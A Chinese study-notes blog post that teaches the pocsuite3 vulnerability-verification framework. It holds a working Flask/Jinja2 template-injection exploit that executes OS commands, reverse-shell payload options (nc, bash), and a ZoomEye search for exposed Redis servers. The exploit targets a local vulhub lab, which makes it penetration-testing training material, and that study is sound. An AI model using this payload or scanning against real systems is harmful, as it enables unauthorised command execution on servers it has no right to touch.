pocsuite是一款基于漏洞与POC的远程漏洞验证框架,记录基本使用和POC跟EXP编写的学习记录

0x01 安装

直接下载解压安装

1
2
wget https://github.com/knownsec/pocsuite3/archive/master.zip
unzip master.zip

0x02 使用方法

Pocsuite具有两种交互模式,一种是命令行模式,另一种是控制台交互模式。–verify参数来调用verify方法,用于验证目标是否存在漏洞,–attack参数调用attack方法,用来向目标发起攻击。

1、verify验证模式,验证目标是否存在漏洞。-r为脚本路径,-u为目标地址

1
python3 pocsuite.py -r pocs/test1.py(脚本路径) -u url --verify

2、批量验证,将需要验证的所有目标IP写到一个txt文件中批量利用

1
python3 pocsuite.py -r pocs/test1.py(脚本路径) -u url.txt --verify

3、加载文件夹下所有poc对目标进行测试,-r为文件夹路径

1
python3 pocsuite.py -r pocs/* -u url --verify

4、使用多线程。–threads表示线程数

1
python3 pocsuite.py -r pocs/test1.py(脚本路径) -u url --verify

5、使用Zoomey搜索引擎,搜索开放端口6379的Redis服务

1
python3 cli.py --dork 'port:6379' --vul-keyword 'redis' --max-page 2

6、Attack模式,向目标发起有效供给

1
python3 pocsuite.py -r pocs/test1.py(脚本路径) -u url --attack

7、使用shell交互式模式,对目标进行远程控制

1
python3 pocsuite.py -r pocs/test1.py(脚本路径) -u url --shell

8、使用自定义命令‘command’,调用外部传递参数,进行半交互式命令执行

1
python3 pocsuite.py -r pocs/test1.py(脚本路径) -u url --attack --command "whoami"

0x03 POC脚本编写

搭建Flask服务器模板环境

这里直接用VULHUB中的环境快速搭建

1
2
3
https://github.com/vulhub/vulhub/tree/master/flask/ssti
docker-compose build
docker-compose up -d

实际编写,将模版的_verify方法替换成Flask漏洞检测脚本既完成POC的编写

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
#!/usr/bin/python3
#新建一个符合POC命令规范的py文件
#编写POC实现类DemoPOC,继承自POCBase类
from collections import OrderedDict
from urllib.parse import urljoin
import re
from pocsuite3.api import POCBase, Output, register_poc, logger, requests, OptDict, VUL_TYPE
from pocsuite3.api import REVERSE_PAYLOAD, POC_CATEGORY

class DemoPOC(POCBase):
vulID = '1.1'
version = '1.1'
author = ['1.1'] # POC作者名字
vu1Date = '1.1' #漏洞公开时间
updateDate = '1.1' #编写POC时间
references = ['flask'] #漏洞地址来源
name = 'flask' #POC名称
appPowerLink = 'flask'#漏洞厂商主页地址
appName = 'flask'#漏洞应用名称
appVersion = '1.1' #漏洞影响版本
vu1Type = '' #漏洞类型
desc = '''
test
''' #漏洞简要描述
samples = ['00.00.00.00:8000'] #测试样例,使用POC测试成功的网站
install_requires = []
# 编写验证模式,在_verify方法中写入POC验证脚本
def _verify(self):
resu1t = {}
path = "/?name="
url = self.url + path
payload = "{{22*22}}"
try:
resq = requests.get(url + payload)
if resq and resq.status_code == 200 and "484" in resq.text:
resu1t['VerifyInfo'] = {}
resu1t['VerifyInfo']['URL'] = url
resu1t['VerifyInfo']['name'] = payload
except Exception as e:
pass
return self.parse_output(resu1t)

def trim(str):
newstr = ''
for ch in str: # 遍历每一个字符串
if ch != ' ':
newstr = newstr + ch
return newstr
#编写攻击模式,用_attack()函数中的写入EXP利用脚本,在攻击模式下可以不对目标进行getshell,查询管理员账户密码等操作
def _attack(self):
output = Output(self)
result = {}
# 攻击代码

def parse_attack(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('target is not vulnerable')
return output

def _shell(self):
return

def parse_output(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('target is not vulnerable')
return output

register_poc(DemoPOC)

0x04 EXP脚本编写

EXP脚本的编写与POC脚本编写一样,只需要修改_attack部分,替换成漏洞利用的脚本即可

1
2
3
4
5
6
7
8
9
10
11
12
13
14
def _attack(self):
resu1t = {}
path = "/?name="
url = self.url + path
payload = 'name=%7B%25%20for%20c%20in%20%5B%5D.__class__.__base__.__subclasses__()%20%25%7D%0A%7B%25%20if%20c.__name__%20%3D%3D%20%27catch_warnings%27%20%25%7D%0A%20%20%7B%25%20for%20b%20in%20c.__init__.__globals__.values()%20%25%7D%0A%20%20%7B%25%20if%20b.__class__%20%3D%3D%20%7B%7D.__class__%20%25%7D%0A%20%20%20%20%7B%25%20if%20%27eval%27%20in%20b.keys()%20%25%7D%0A%20%20%20%20%20%20%7B%7B%20b%5B%27eval%27%5D(%27__import__("os").popen("whoami").read()%27)%20%7D%7D%0A%20%20%20%20%7B%25%20endif%20%25%7D%0A%20%20%7B%25%20endif%20%25%7D%0A%20%20%7B%25%20endfor%20%25%7D%0A%7B%25%20endif%20%25%7D%0A%7B%25%20endfor%20%25%7D'
try:
resq = requests.get(url + payload)
if resq and resq.status_code == 200 and "www" in resq.text:
resu1t['VerifyInfo'] = {}
resu1t['VerifyInfo']['URL'] = url
resu1t['VerifyInfo']['name'] = payload
except Exception as e:
pass
return self.parse_output(resu1t)

既完成EXP编写,运行如下

1
python3 cli.py -r pocs/exp_flask.py -u http://127.0.0.1:8000 --attack

在Pocsuite3中,可以接受用户输入的命令行参数,对目标系统进行半交互控制。先要编写一个接受自定义命令的函数,将接收到的命令赋值给command参数

1
2
3
4
5
6
7
8
def _options(self):
o = OrderedDict()
payload = {
"nc": REVERSE_PAYLOAD.NC,
"bash": REVERSE_PAYLOAD.BASH,
}
o["command"] = OptDict(selected="bash", default=payload)
return o

下面,创造一个cmd变量,用于接收用户输入的command命令参数,并嵌入payload字符串中。将写好的payload与url地址拼接,并通过requests函数发送到目标系统,即可在目标系统执行命令,将命令执行结果输出

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
def _attack(self):
resu1t = {}
path = "/?name="
url = self.url + path
payload = 'name=%7B%25%20for%20c%20in%20%5B%5D.__class__.__base__.__subclasses__()%20%25%7D%0A%7B%25%20if%20c.__name__%20%3D%3D%20%27catch_warnings%27%20%25%7D%0A%20%20%7B%25%20for%20b%20in%20c.__init__.__globals__.values()%20%25%7D%0A%20%20%7B%25%20if%20b.__class__%20%3D%3D%20%7B%7D.__class__%20%25%7D%0A%20%20%20%20%7B%25%20if%20%27eval%27%20in%20b.keys()%20%25%7D%0A%20%20%20%20%20%20%7B%7B%20b%5B%27eval%27%5D(%27__import__("os").popen("whoami").read()%27)%20%7D%7D%0A%20%20%20%20%7B%25%20endif%20%25%7D%0A%20%20%7B%25%20endif%20%25%7D%0A%20%20%7B%25%20endfor%20%25%7D%0A%7B%25%20endif%20%25%7D%0A%7B%25%20endfor%20%25%7D'
try:
resq = requests.get(url + payload)
t = resq.text
t = t.replace('\n', '').replace('\r', '')
print(t)
t = t.replace(" ","")
if resq and resq.status_code == 200 and "www" in resq.text:
resu1t['VerifyInfo'] = {}
resu1t['VerifyInfo']['URL'] = url
resu1t['VerifyInfo']['name'] = t
except Exception as e:
pass
return self.parse_output(resu1t)

最终完成的代码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
#!/usr/bin/python3
from collections import OrderedDict
from urllib.parse import urljoin
import re
from pocsuite3.api import POCBase, Output, register_poc, logger, requests, OptDict, VUL_TYPE
from pocsuite3.api import REVERSE_PAYLOAD, POC_CATEGORY

class DemoPOC(POCBase):
vulID = '1.1'
version = '1.1'
author = ['1.1'] # POC作者名字
vu1Date = '1.1' # 漏洞公开时间
updateDate = '1.1' # 编写POC时间
references = ['flask'] # 漏洞地址来源
name = 'flask' # POC名称
appPowerLink = 'flask' # 漏洞厂商主页地址
appName = 'flask' # 漏洞应用名称
appVersion = '1.1' # 漏洞影响版本
vu1Type = '' # 漏洞类型
desc = '''
test
''' # 漏洞简要描述
samples = ['00.00.00.00:8000'] # 测试样例,使用POC测试成功的网站
install_requires = []

def _options(self):
o = OrderedDict()
payload = {
"nc": REVERSE_PAYLOAD.NC,
"bash": REVERSE_PAYLOAD.BASH,
}
o["command"] = OptDict(selected="bash", default=payload)
return o
def _verify(self):
# output = Output(self)
# result = {}
resu1t = {}
path = "/?name="
url = self.url + path
payload = "{{22*22}}"
try:
resq = requests.get(url + payload)
if resq and resq.status_code == 200 and "484" in resq.text:
resu1t['VerifyInfo'] = {}
resu1t['VerifyInfo']['URL'] = url
resu1t['VerifyInfo']['name'] = payload
except Exception as e:
pass
return self.parse_output(resu1t)

def _attack(self):
resu1t = {}
path = "/?name="
url = self.url + path
payload = 'name=%7B%25%20for%20c%20in%20%5B%5D.__class__.__base__.__subclasses__()%20%25%7D%0A%7B%25%20if%20c.__name__%20%3D%3D%20%27catch_warnings%27%20%25%7D%0A%20%20%7B%25%20for%20b%20in%20c.__init__.__globals__.values()%20%25%7D%0A%20%20%7B%25%20if%20b.__class__%20%3D%3D%20%7B%7D.__class__%20%25%7D%0A%20%20%20%20%7B%25%20if%20%27eval%27%20in%20b.keys()%20%25%7D%0A%20%20%20%20%20%20%7B%7B%20b%5B%27eval%27%5D(%27__import__("os").popen("whoami").read()%27)%20%7D%7D%0A%20%20%20%20%7B%25%20endif%20%25%7D%0A%20%20%7B%25%20endif%20%25%7D%0A%20%20%7B%25%20endfor%20%25%7D%0A%7B%25%20endif%20%25%7D%0A%7B%25%20endfor%20%25%7D'
try:
resq = requests.get(url + payload)
t = resq.text
t = t.replace('\n', '').replace('\r', '')
print(t)
t = t.replace(" ","")
if resq and resq.status_code == 200 and "www" in resq.text:
resu1t['VerifyInfo'] = {}
resu1t['VerifyInfo']['URL'] = url
resu1t['VerifyInfo']['name'] = t
except Exception as e:
pass
return self.parse_output(resu1t)


def parse_attack(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('target is not vulnerable')
return output

def _shell(self):
return

def parse_output(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('target is not vulnerable')
return output

register_poc(DemoPOC)

运行

1
python3 cli.py -r pocs/exp_flask.py -u http://127.0.0.1:8000 --attack --command 'id'

参考资料

python安全攻防渗透测试实战指南